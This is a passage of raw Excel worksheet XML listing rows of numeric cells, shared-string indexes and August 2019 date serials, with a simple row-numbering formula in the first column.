      <c r="C13434" t="s">
        <v>19637</v>
      </c>
      <c r="D13434" s="1">
        <v>43696</v>
      </c>
      <c r="E13434" t="s">
        <v>19640</v>
      </c>
      <c r="F13434" t="s">
        <v>10021</v>
      </c>
      <c r="G13434" t="s">
        <v>23756</v>
      </c>
    </row>
    <row r="13435" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13435">
        <f t="shared" si="209"/>
        <v>13434</v>
      </c>
      <c r="B13435">
        <v>3434</v>
      </c>
      <c r="C13435" t="s">
        <v>19637</v>
      </c>
      <c r="D13435" s="1">
        <v>43687</v>
      </c>
      <c r="F13435" t="s">
        <v>10021</v>
      </c>
      <c r="G13435" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13436" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13436">
        <f t="shared" si="209"/>
        <v>13435</v>
      </c>
      <c r="B13436">
        <v>3435</v>
      </c>
      <c r="C13436" t="s">
        <v>19637</v>
      </c>
      <c r="D13436" s="1">
        <v>43695</v>
      </c>
      <c r="E13436" t="s">
        <v>19672</v>
      </c>
      <c r="F13436" t="s">
        <v>10021</v>
      </c>
      <c r="G13436" t="s">
        <v>23757</v>
      </c>
    </row>
    <row r="13437" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13437">
        <f t="shared" si="209"/>
        <v>13436</v>
      </c>
      <c r="B13437">
        <v>3436</v>
      </c>
      <c r="C13437" t="s">
        <v>19637</v>
      </c>
      <c r="D13437" s="1">
        <v>43687</v>
      </c>
      <c r="E13437" t="s">
        <v>20187</v>
      </c>
      <c r="F13437" t="s">
        <v>9975</v>
      </c>
      <c r="G13437" t="s">
        <v>23758</v>
      </c>
    </row>
    <row r="13438" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13438">
        <f t="shared" si="209"/>
        <v>13437</v>
      </c>
      <c r="B13438">
        <v>3437</v>
      </c>
      <c r="C13438" t="s">
        <v>19637</v>
      </c>
      <c r="D13438" s="1">
        <v>43707</v>
      </c>
      <c r="E13438" t="s">
        <v>20704</v>
      </c>
      <c r="F13438" t="s">
        <v>10526</v>
      </c>
      <c r="G13438" t="s">
        <v>23759</v>
      </c>
    </row>
    <row r="13439" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13439">
        <f t="shared" si="209"/>
        <v>13438</v>
      </c>
      <c r="B13439">
        <v>3438</v>
      </c>
      <c r="C13439" t="s">
        <v>19637</v>
      </c>
      <c r="D13439" s="1">
        <v>43701</v>
      </c>
      <c r="E13439" t="s">
        <v>20187</v>
      </c>
      <c r="F13439" t="s">
        <v>9975</v>
      </c>
      <c r="G13439" t="s">
        <v>23760</v>
      </c>
    </row>
    <row r="13440" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13440">
        <f t="shared" si="209"/>
        <v>13439</v>
      </c>
      <c r="B13440">
        <v>3439</v>
      </c>
      <c r="C13440" t="s">
        <v>19637</v>
      </c>
      <c r="D13440" s="1">
        <v>43687</v>
      </c>
      <c r="F13440" t="s">
        <v>10526</v>
      </c>
      <c r="G13440" t="s">
        <v>23761</v>
      </c>
    </row>
    <row r="13441" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13441">
        <f t="shared" si="209"/>
        <v>13440</v>
      </c>
      <c r="B13441">
        <v>3440</v>
      </c>
      <c r="C13441" t="s">
        <v>19637</v>
      </c>
      <c r="D13441" s="1">
        <v>43703</v>
      </c>
      <c r="E13441" t="s">
        <v>21156</v>
      </c>
      <c r="F13441" t="s">
        <v>10021</v>
      </c>
      <c r="G13441" t="s">
        <v>23762</v>
      </c>
    </row>
    <row r="13442" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13442">
        <f t="shared" si="209"/>
        <v>13441</v>
      </c>
      <c r="B13442">
        <v>3441</v>
      </c>
      <c r="C13442" t="s">
        <v>19637</v>
      </c>
      <c r="D13442" s="1">
        <v>43707</v>
      </c>
      <c r="E13442" t="s">
        <v>19640</v>
      </c>
      <c r="F13442" t="s">
        <v>10526</v>
      </c>
      <c r="G13442" t="s">
        <v>23763</v>
      </c>
    </row>
    <row r="13443" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13443">
        <f t="shared" ref="A13443:A13506" si="210">+ROW(A13442)</f>
        <v>13442</v>
      </c>
      <c r="B13443">
        <v>3442</v>
      </c>
      <c r="C13443" t="s">
        <v>19637</v>
      </c>
      <c r="D13443" s="1">
        <v>43702</v>
      </c>
      <c r="E13443" t="s">
        <v>23764</v>
      </c>
      <c r="F13443" t="s">
        <v>10526</v>
      </c>
      <c r="G13443" t="s">
        <v>23765</v>
      </c>
    </row>
    <row r="13444" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13444">
        <f t="shared" si="210"/>
        <v>13443</v>
      </c>
      <c r="B13444">
        <v>3443</v>
      </c>
      <c r="C13444" t="s">
        <v>19637</v>
      </c>
      <c r="D13444" s="1">
        <v>43699</v>
      </c>
      <c r="F13444" t="s">
        <v>10526</v>
      </c>
      <c r="G13444" t="s">
        <v>23766</v>
      </c>
    </row>
    <row r="13445" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13445">
        <f t="shared" si="210"/>
        <v>13444</v>
      </c>
      <c r="B13445">
        <v>3444</v>
      </c>
      <c r="C13445" t="s">
        <v>19637</v>
      </c>
      <c r="D13445" s="1">
        <v>43700</v>
      </c>
      <c r="E13445" t="s">
        <v>19687</v>
      </c>
      <c r="F13445" t="s">
        <v>10021</v>
      </c>
      <c r="G13445" t="s">
        <v>23767</v>
      </c>
    </row>
    <row r="13446" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13446">
        <f t="shared" si="210"/>
        <v>13445</v>
      </c>
      <c r="B13446">
        <v>3445</v>
      </c>
      <c r="C13446" t="s">
        <v>19637</v>
      </c>
      <c r="D13446" s="1">
        <v>43683</v>
      </c>
      <c r="F13446" t="s">
        <v>10526</v>
      </c>
      <c r="G13446" t="s">
        <v>23768</v>
      </c>
    </row>
    <row r="13447" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13447">
        <f t="shared" si="210"/>
        <v>13446</v>
      </c>
      <c r="B13447">
        <v>3446</v>
      </c>
      <c r="C13447" t="s">
        <v>19637</v>
      </c>
      <c r="D13447" s="1">
        <v>43688</v>
      </c>
      <c r="E13447" t="s">
        <v>23769</v>
      </c>
      <c r="F13447" t="s">
        <v>10526</v>
      </c>
      <c r="G13447" t="s">
        <v>23770</v>
      </c>
    </row>
    <row r="13448" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13448">
        <f t="shared" si="210"/>
        <v>13447</v>
      </c>
      <c r="B13448">
        <v>3447</v>
      </c>
      <c r="C13448" t="s">
        <v>19637</v>
      </c>
      <c r="D13448" s="1">
        <v>43699</v>
      </c>
      <c r="E13448" t="s">
        <v>19672</v>
      </c>
      <c r="F13448" t="s">
        <v>10021</v>
      </c>
      <c r="G13448" t="s">
        <v>23771</v>
      </c>
    </row>
    <row r="13449" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13449">
        <f t="shared" si="210"/>
        <v>13448</v>
      </c>
      <c r="B13449">
        <v>3448</v>
      </c>
      <c r="C13449" t="s">
        <v>19637</v>
      </c>
      <c r="D13449" s="1">
        <v>43703</v>
      </c>
      <c r="E13449" t="s">
        <v>19640</v>
      </c>
      <c r="F13449" t="s">
        <v>10021</v>
      </c>
      <c r="G13449" t="s">
        <v>23772</v>
      </c>
    </row>
    <row r="13450" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13450">
        <f t="shared" si="210"/>
        <v>13449</v>
      </c>
      <c r="B13450">
        <v>3449</v>
      </c>
      <c r="C13450" t="s">
        <v>19637</v>
      </c>
      <c r="D13450" s="1">
        <v>43686</v>
      </c>
      <c r="E13450" t="s">
        <v>19840</v>
      </c>
      <c r="F13450" t="s">
        <v>10021</v>
      </c>
      <c r="G13450" t="s">
        <v>23773</v>
      </c>
    </row>
    <row r="13451" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13451">
        <f t="shared" si="210"/>
        <v>13450</v>
      </c>
      <c r="B13451">
        <v>3450</v>
      </c>
      <c r="C13451" t="s">
        <v>19637</v>
      </c>
      <c r="D13451" s="1">
        <v>43707</v>
      </c>
      <c r="F13451" t="s">
        <v>10526</v>
      </c>
      <c r="G13451" t="s">
        <v>23774</v>
      </c>
    </row>
    <row r="13452" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13452">
        <f t="shared" si="210"/>
        <v>13451</v>
      </c>
      <c r="B13452">
        <v>3451</v>
      </c>
      <c r="C13452" t="s">
        <v>19637</v>
      </c>
      <c r="D13452" s="1">
        <v>43702</v>
      </c>
      <c r="E13452" t="s">
        <v>19640</v>
      </c>
      <c r="F13452" t="s">
        <v>10021</v>
      </c>
      <c r="G13452" t="s">
        <v>23775</v>
      </c>
    </row>
    <row r="13453" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13453">
        <f t="shared" si="210"/>
        <v>13452</v>
      </c>
      <c r="B13453">
        <v>3452</v>
      </c>
      <c r="C13453" t="s">
        <v>19637</v>
      </c>
      <c r="D13453" s="1">
        <v>43706</v>
      </c>
      <c r="E13453" t="s">
        <v>19640</v>
      </c>
      <c r="F13453" t="s">
        <v>10021</v>
      </c>
      <c r="G13453" t="s">
        <v>23776</v>
      </c>
    </row>
    <row r="13454" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13454">
        <f t="shared" si="210"/>
        <v>13453</v>
      </c>
      <c r="B13454">
        <v>3453</v>
      </c>
      <c r="C13454" t="s">
        <v>19637</v>
      </c>
      <c r="D13454" s="1">
        <v>43689</v>
      </c>
      <c r="F13454" t="s">
        <v>10526</v>
      </c>
      <c r="G13454" t="s">
        <v>23777</v>
      </c>
    </row>
    <row r="13455" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13455">
        <f t="shared" si="210"/>
        <v>13454</v>
      </c>
      <c r="B13455">
        <v>3454</v>
      </c>
      <c r="C13455" t="s">
        <v>19637</v>
      </c>
      <c r="D13455" s="1">
        <v>43696</v>
      </c>
      <c r="F13455" t="s">
        <v>10526</v>
      </c>
      <c r="G13455" t="s">
        <v>23778</v>
      </c>
    </row>
    <row r="13456" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13456">
        <f t="shared" si="210"/>
        <v>13455</v>
      </c>
      <c r="B13456">
        <v>3455</v>
      </c>
      <c r="C13456" t="s">
        <v>19637</v>
      </c>
      <c r="D13456" s="1">
        <v>43705</v>
      </c>
      <c r="E13456" t="s">
        <v>19994</v>
      </c>
      <c r="F13456" t="s">
        <v>10021</v>
      </c>
      <c r="G13456" t="s">
        <v>23779</v>
      </c>
    </row>
    <row r="13457" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13457">
        <f t="shared" si="210"/>
        <v>13456</v>
      </c>
      <c r="B13457">
        <v>3456</v>
      </c>
      <c r="C13457" t="s">
        <v>19637</v>
      </c>
      <c r="D13457" s="1">
        <v>43705</v>
      </c>
      <c r="E13457" t="s">
        <v>23780</v>
      </c>
      <c r="F13457" t="s">
        <v>9978</v>
      </c>
      <c r="G13457" t="s">
        <v>23781</v>
      </c>
    </row>
    <row r="13458" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13458">
        <f t="shared" si="210"/>
        <v>13457</v>
      </c>
      <c r="B13458">
        <v>3457</v>
      </c>
      <c r="C13458" t="s">
        <v>19637</v>
      </c>
      <c r="D13458" s="1">
        <v>43686</v>
      </c>
      <c r="E13458" t="s">
        <v>19640</v>
      </c>
      <c r="F13458" t="s">
        <v>10526</v>
      </c>
      <c r="G13458" t="s">
        <v>23782</v>
      </c>
    </row>
    <row r="13459" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13459">
        <f t="shared" si="210"/>
        <v>13458</v>
      </c>
      <c r="B13459">
        <v>3458</v>
      </c>
      <c r="C13459" t="s">
        <v>19637</v>
      </c>
      <c r="D13459" s="1">
        <v>43697</v>
      </c>
      <c r="E13459" t="s">
        <v>19680</v>
      </c>
      <c r="F13459" t="s">
        <v>10021</v>
      </c>
      <c r="G13459" t="s">
        <v>23783</v>
      </c>
    </row>
    <row r="13460" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13460">
        <f t="shared" si="210"/>
        <v>13459</v>
      </c>
      <c r="B13460">
        <v>3459</v>
      </c>
      <c r="C13460" t="s">
        <v>19637</v>
      </c>
      <c r="D13460" s="1">
        <v>43705</v>
      </c>
      <c r="F13460" t="s">
        <v>10526</v>
      </c>
      <c r="G13460" t="s">
        <v>23512</v>
      </c>
    </row>
    <row r="13461" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13461">
        <f t="shared" si="210"/>
        <v>13460</v>
      </c>
      <c r="B13461">
        <v>3460</v>
      </c>
      <c r="C13461" t="s">
        <v>19637</v>
      </c>
      <c r="D13461" s="1">
        <v>43699</v>
      </c>
      <c r="E13461" t="s">
        <v>19687</v>
      </c>
      <c r="F13461" t="s">
        <v>10021</v>
      </c>
      <c r="G13461" t="s">
        <v>23784</v>
      </c>
    </row>
    <row r="13462" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13462">
        <f t="shared" si="210"/>
        <v>13461</v>
      </c>
      <c r="B13462">
        <v>3461</v>
      </c>
      <c r="C13462" t="s">
        <v>19637</v>
      </c>
      <c r="D13462" s="1">
        <v>43686</v>
      </c>
      <c r="E13462" t="s">
        <v>23785</v>
      </c>
      <c r="F13462" t="s">
        <v>9978</v>
      </c>
      <c r="G13462" t="s">
        <v>23786</v>
      </c>
    </row>
    <row r="13463" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13463">
        <f t="shared" si="210"/>
        <v>13462</v>
      </c>
      <c r="B13463">
        <v>3462</v>
      </c>
      <c r="C13463" t="s">
        <v>19637</v>
      </c>
      <c r="D13463" s="1">
        <v>43705</v>
      </c>
      <c r="F13463" t="s">
        <v>10526</v>
      </c>
      <c r="G13463" t="s">
        <v>23787</v>
      </c>
    </row>
    <row r="13464" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13464">
        <f t="shared" si="210"/>
        <v>13463</v>
      </c>
      <c r="B13464">
        <v>3463</v>
      </c>
      <c r="C13464" t="s">
        <v>19637</v>
      </c>
      <c r="D13464" s="1">
        <v>43697</v>
      </c>
      <c r="E13464" t="s">
        <v>19896</v>
      </c>
      <c r="F13464" t="s">
        <v>10021</v>
      </c>
      <c r="G13464" t="s">
        <v>23788</v>
      </c>
    </row>
    <row r="13465" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13465">
        <f t="shared" si="210"/>
        <v>13464</v>
      </c>
      <c r="B13465">
        <v>3464</v>
      </c>
      <c r="C13465" t="s">
        <v>19637</v>
      </c>
      <c r="D13465" s="1">
        <v>43684</v>
      </c>
      <c r="E13465" t="s">
        <v>23789</v>
      </c>
      <c r="F13465" t="s">
        <v>10526</v>
      </c>
      <c r="G13465" t="s">
        <v>23790</v>
      </c>
    </row>
    <row r="13466" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13466">
        <f t="shared" si="210"/>
        <v>13465</v>
      </c>
      <c r="B13466">
        <v>3465</v>
      </c>
      <c r="C13466" t="s">
        <v>19637</v>
      </c>
      <c r="D13466" s="1">
        <v>43687</v>
      </c>
      <c r="E13466" t="s">
        <v>19640</v>
      </c>
      <c r="F13466" t="s">
        <v>9975</v>
      </c>
      <c r="G13466" t="s">
        <v>23791</v>
      </c>
    </row>
    <row r="13467" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13467">
        <f t="shared" si="210"/>
        <v>13466</v>
      </c>
      <c r="B13467">
        <v>3466</v>
      </c>
      <c r="C13467" t="s">
        <v>19637</v>
      </c>
      <c r="D13467" s="1">
        <v>43706</v>
      </c>
      <c r="E13467" t="s">
        <v>23792</v>
      </c>
      <c r="F13467" t="s">
        <v>10021</v>
      </c>
      <c r="G13467" t="s">
        <v>23793</v>
      </c>
    </row>
    <row r="13468" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13468">
        <f t="shared" si="210"/>
        <v>13467</v>
      </c>
      <c r="B13468">
        <v>3467</v>
      </c>
      <c r="C13468" t="s">
        <v>19637</v>
      </c>
      <c r="D13468" s="1">
        <v>43702</v>
      </c>
      <c r="E13468" t="s">
        <v>19750</v>
      </c>
      <c r="F13468" t="s">
        <v>9978</v>
      </c>
      <c r="G13468" t="s">
        <v>23794</v>
      </c>
    </row>
    <row r="13469" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13469">
        <f t="shared" si="210"/>
        <v>13468</v>
      </c>
      <c r="B13469">
        <v>3468</v>
      </c>
      <c r="C13469" t="s">
        <v>19637</v>
      </c>
      <c r="D13469" s="1">
        <v>43692</v>
      </c>
      <c r="E13469" t="s">
        <v>20862</v>
      </c>
      <c r="F13469" t="s">
        <v>10021</v>
      </c>
      <c r="G13469" t="s">
        <v>23795</v>
      </c>
    </row>
    <row r="13470" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13470">
        <f t="shared" si="210"/>
        <v>13469</v>
      </c>
      <c r="B13470">
        <v>3469</v>
      </c>
      <c r="C13470" t="s">
        <v>19637</v>
      </c>
      <c r="D13470" s="1">
        <v>43687</v>
      </c>
      <c r="E13470" t="s">
        <v>23796</v>
      </c>
      <c r="F13470" t="s">
        <v>9978</v>
      </c>
      <c r="G13470" t="s">
        <v>23797</v>
      </c>
    </row>
    <row r="13471" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13471">
        <f t="shared" si="210"/>
        <v>13470</v>
      </c>
      <c r="B13471">
        <v>3470</v>
      </c>
      <c r="C13471" t="s">
        <v>19637</v>
      </c>
      <c r="D13471" s="1">
        <v>43691</v>
      </c>
      <c r="E13471" t="s">
        <v>19680</v>
      </c>
      <c r="F13471" t="s">
        <v>10021</v>
      </c>
      <c r="G13471" t="s">
        <v>23798</v>
      </c>
    </row>
    <row r="13472" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13472">
        <f t="shared" si="210"/>
        <v>13471</v>
      </c>
      <c r="B13472">
        <v>3471</v>
      </c>
      <c r="C13472" t="s">
        <v>19637</v>
      </c>
      <c r="D13472" s="1">
        <v>43694</v>
      </c>
      <c r="E13472" t="s">
        <v>20037</v>
      </c>
      <c r="F13472" t="s">
        <v>10526</v>
      </c>
      <c r="G13472" t="s">
        <v>23799</v>
      </c>
    </row>
    <row r="13473" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13473">
        <f t="shared" si="210"/>
        <v>13472</v>
      </c>
      <c r="B13473">
        <v>3472</v>
      </c>
      <c r="C13473" t="s">
        <v>19637</v>
      </c>
      <c r="D13473" s="1">
        <v>43682</v>
      </c>
      <c r="E13473" t="s">
        <v>23800</v>
      </c>
      <c r="F13473" t="s">
        <v>10526</v>
      </c>
      <c r="G13473" t="s">
        <v>23801</v>
      </c>
    </row>
    <row r="13474" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13474">
        <f t="shared" si="210"/>
        <v>13473</v>
      </c>
      <c r="B13474">
        <v>3473</v>
      </c>
      <c r="C13474" t="s">
        <v>19637</v>
      </c>
      <c r="D13474" s="1">
        <v>43683</v>
      </c>
      <c r="E13474" t="s">
        <v>19690</v>
      </c>
      <c r="F13474" t="s">
        <v>9978</v>
      </c>
      <c r="G13474" t="s">
        <v>23802</v>
      </c>
    </row>
    <row r="13475" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13475">
        <f t="shared" si="210"/>
        <v>13474</v>
      </c>
      <c r="B13475">
        <v>3474</v>
      </c>
      <c r="C13475" t="s">
        <v>19637</v>
      </c>
      <c r="D13475" s="1">
        <v>43687</v>
      </c>
      <c r="E13475" t="s">
        <v>19638</v>
      </c>
      <c r="F13475" t="s">
        <v>10021</v>
      </c>
      <c r="G13475" t="s">
        <v>23803</v>
      </c>
    </row>
    <row r="13476" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13476">
        <f t="shared" si="210"/>
        <v>13475</v>
      </c>
      <c r="B13476">
        <v>3475</v>
      </c>
      <c r="C13476" t="s">
        <v>19637</v>
      </c>
      <c r="D13476" s="1">
        <v>43686</v>
      </c>
      <c r="E13476" t="s">
        <v>23804</v>
      </c>
      <c r="F13476" t="s">
        <v>10526</v>
      </c>
      <c r="G13476" t="s">
        <v>23805</v>
      </c>
    </row>
    <row r="13477" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13477">
        <f t="shared" si="210"/>
        <v>13476</v>
      </c>
      <c r="B13477">
        <v>3476</v>
      </c>
      <c r="C13477" t="s">
        <v>19637</v>
      </c>
      <c r="D13477" s="1">
        <v>43688</v>
      </c>
      <c r="E13477" t="s">
        <v>19896</v>
      </c>
      <c r="F13477" t="s">
        <v>10021</v>
      </c>
      <c r="G13477" t="s">
        <v>23806</v>
      </c>
    </row>
    <row r="13478" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13478">
        <f t="shared" si="210"/>
        <v>13477</v>
      </c>
      <c r="B13478">
        <v>3477</v>
      </c>
      <c r="C13478" t="s">
        <v>19637</v>
      </c>
      <c r="D13478" s="1">
        <v>43688</v>
      </c>
      <c r="E13478" t="s">
        <v>23576</v>
      </c>
      <c r="F13478" t="s">
        <v>9975</v>
      </c>
      <c r="G13478" t="s">
        <v>23807</v>
      </c>
    </row>
    <row r="13479" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13479">
        <f t="shared" si="210"/>
        <v>13478</v>
      </c>
      <c r="B13479">
        <v>3478</v>
      </c>
      <c r="C13479" t="s">
        <v>19637</v>
      </c>
      <c r="D13479" s="1">
        <v>43703</v>
      </c>
      <c r="F13479" t="s">
        <v>10526</v>
      </c>
      <c r="G13479" t="s">
        <v>23808</v>
      </c>
    </row>
    <row r="13480" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13480">
        <f t="shared" si="210"/>
        <v>13479</v>
      </c>
      <c r="B13480">
        <v>3479</v>
      </c>
      <c r="C13480" t="s">
        <v>19637</v>
      </c>
      <c r="D13480" s="1">
        <v>43698</v>
      </c>
      <c r="E13480" t="s">
        <v>21281</v>
      </c>
      <c r="F13480" t="s">
        <v>10526</v>
      </c>
      <c r="G13480" t="s">
        <v>23809</v>
      </c>
    </row>
    <row r="13481" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13481">
        <f t="shared" si="210"/>
        <v>13480</v>
      </c>
      <c r="B13481">
        <v>3480</v>
      </c>
      <c r="C13481" t="s">
        <v>19637</v>
      </c>
      <c r="D13481" s="1">
        <v>43698</v>
      </c>
      <c r="E13481" t="s">
        <v>23181</v>
      </c>
      <c r="F13481" t="s">
        <v>10021</v>
      </c>
      <c r="G13481" t="s">
        <v>23810</v>
      </c>
    </row>
    <row r="13482" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13482">
        <f t="shared" si="210"/>
        <v>13481</v>
      </c>
      <c r="B13482">
        <v>3481</v>
      </c>
      <c r="C13482" t="s">
        <v>19637</v>
      </c>
      <c r="D13482" s="1">
        <v>43703</v>
      </c>
      <c r="E13482" t="s">
        <v>20739</v>
      </c>
      <c r="F13482" t="s">
        <v>10021</v>
      </c>
      <c r="G13482" t="s">
        <v>23811</v>
      </c>
    </row>
    <row r="13483" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13483">
        <f t="shared" si="210"/>
        <v>13482</v>
      </c>
      <c r="B13483">
        <v>3482</v>
      </c>
      <c r="C13483" t="s">
        <v>19637</v>
      </c>
      <c r="D13483" s="1">
        <v>43705</v>
      </c>
      <c r="E13483" t="s">
        <v>20250</v>
      </c>
      <c r="F13483" t="s">
        <v>10021</v>
      </c>
      <c r="G13483" t="s">
        <v>23812</v>
      </c>
    </row>
    <row r="13484" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13484">
        <f t="shared" si="210"/>
        <v>13483</v>
      </c>
      <c r="B13484">
        <v>3483</v>
      </c>
      <c r="C13484" t="s">
        <v>19637</v>
      </c>
      <c r="D13484" s="1">
        <v>43693</v>
      </c>
      <c r="E13484" t="s">
        <v>23813</v>
      </c>
      <c r="F13484" t="s">
        <v>10526</v>
      </c>
      <c r="G13484" t="s">
        <v>23814</v>
      </c>
    </row>
    <row r="13485" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13485">
        <f t="shared" si="210"/>
        <v>13484</v>
      </c>
      <c r="B13485">
        <v>3484</v>
      </c>
      <c r="C13485" t="s">
        <v>19637</v>
      </c>
      <c r="D13485" s="1">
        <v>43681</v>
      </c>
      <c r="F13485" t="s">
        <v>10526</v>
      </c>
      <c r="G13485" t="s">
        <v>23815</v>
      </c>
    </row>
    <row r="13486" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13486">
        <f t="shared" si="210"/>
        <v>13485</v>
      </c>
      <c r="B13486">
        <v>3485</v>
      </c>
      <c r="C13486" t="s">
        <v>19637</v>
      </c>
      <c r="D13486" s="1">
        <v>43687</v>
      </c>
      <c r="F13486" t="s">
        <v>9975</v>
      </c>
      <c r="G13486" t="s">
        <v>23816</v>
      </c>
    </row>
    <row r="13487" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13487">
        <f t="shared" si="210"/>
        <v>13486</v>
      </c>
      <c r="B13487">
        <v>3486</v>
      </c>
      <c r="C13487" t="s">
        <v>19637</v>
      </c>
      <c r="D13487" s="1">
        <v>43692</v>
      </c>
      <c r="E13487" t="s">
        <v>19640</v>
      </c>
      <c r="F13487" t="s">
        <v>10021</v>
      </c>
      <c r="G13487" t="s">
        <v>23817</v>
      </c>
    </row>
    <row r="13488" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13488">
        <f t="shared" si="210"/>
        <v>13487</v>
      </c>
      <c r="B13488">
        <v>3487</v>
      </c>
      <c r="C13488" t="s">
        <v>19637</v>
      </c>
      <c r="D13488" s="1">
        <v>43705</v>
      </c>
      <c r="E13488" t="s">
        <v>23818</v>
      </c>
      <c r="F13488" t="s">
        <v>10526</v>
      </c>
      <c r="G13488" t="s">
        <v>23819</v>
      </c>
    </row>
    <row r="13489" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13489">
        <f t="shared" si="210"/>
        <v>13488</v>
      </c>
      <c r="B13489">
        <v>3488</v>
      </c>
      <c r="C13489" t="s">
        <v>19637</v>
      </c>
      <c r="D13489" s="1">
        <v>43694</v>
      </c>
      <c r="F13489" t="s">
        <v>10021</v>
      </c>
      <c r="G13489" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13490" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13490">
        <f t="shared" si="210"/>
        <v>13489</v>
      </c>
      <c r="B13490">
        <v>3489</v>
      </c>
      <c r="C13490" t="s">
        <v>19637</v>
      </c>
      <c r="D13490" s="1">
        <v>43684</v>
      </c>
      <c r="E13490" t="s">
        <v>19687</v>
      </c>
      <c r="F13490" t="s">
        <v>10021</v>
      </c>
      <c r="G13490" t="s">
        <v>23820</v>
      </c>
    </row>
    <row r="13491" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13491">
        <f t="shared" si="210"/>
        <v>13490</v>
      </c>
      <c r="B13491">
        <v>3490</v>
      </c>
      <c r="C13491" t="s">
        <v>19637</v>
      </c>
      <c r="D13491" s="1">
        <v>43702</v>
      </c>
      <c r="E13491" t="s">
        <v>20672</v>
      </c>
      <c r="F13491" t="s">
        <v>9975</v>
      </c>
      <c r="G13491" t="s">
        <v>23821</v>
      </c>
    </row>
    <row r="13492" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13492">
        <f t="shared" si="210"/>
        <v>13491</v>
      </c>
      <c r="B13492">
        <v>3491</v>
      </c>
      <c r="C13492" t="s">
        <v>19637</v>
      </c>
      <c r="D13492" s="1">
        <v>43699</v>
      </c>
      <c r="E13492" t="s">
        <v>23822</v>
      </c>
      <c r="F13492" t="s">
        <v>10021</v>
      </c>
      <c r="G13492" t="s">
        <v>23823</v>
      </c>
    </row>
    <row r="13493" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13493">
        <f t="shared" si="210"/>
        <v>13492</v>
      </c>
      <c r="B13493">
        <v>3492</v>
      </c>
      <c r="C13493" t="s">
        <v>19637</v>
      </c>
      <c r="D13493" s="1">
        <v>43686</v>
      </c>
      <c r="E13493" t="s">
        <v>23824</v>
      </c>
      <c r="F13493" t="s">
        <v>9975</v>
      </c>
      <c r="G13493" t="s">
        <v>23825</v>
      </c>
    </row>
    <row r="13494" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13494">
        <f t="shared" si="210"/>
        <v>13493</v>
      </c>
      <c r="B13494">
        <v>3493</v>
      </c>
      <c r="C13494" t="s">
        <v>19637</v>
      </c>
      <c r="D13494" s="1">
        <v>43697</v>
      </c>
      <c r="E13494" t="s">
        <v>19648</v>
      </c>
      <c r="F13494" t="s">
        <v>10021</v>
      </c>
      <c r="G13494" t="s">
        <v>23826</v>
      </c>
    </row>
    <row r="13495" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13495">
        <f t="shared" si="210"/>
        <v>13494</v>
      </c>
      <c r="B13495">
        <v>3494</v>
      </c>
      <c r="C13495" t="s">
        <v>19637</v>
      </c>
      <c r="D13495" s="1">
        <v>43678</v>
      </c>
      <c r="E13495" t="s">
        <v>23827</v>
      </c>
      <c r="F13495" t="s">
        <v>10526</v>
      </c>
      <c r="G13495" t="s">
        <v>23828</v>
      </c>
    </row>
    <row r="13496" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13496">
        <f t="shared" si="210"/>
        <v>13495</v>
      </c>
      <c r="B13496">
        <v>3495</v>
      </c>
      <c r="C13496" t="s">
        <v>19637</v>
      </c>
      <c r="D13496" s="1">
        <v>43680</v>
      </c>
      <c r="E13496" t="s">
        <v>19640</v>
      </c>
      <c r="F13496" t="s">
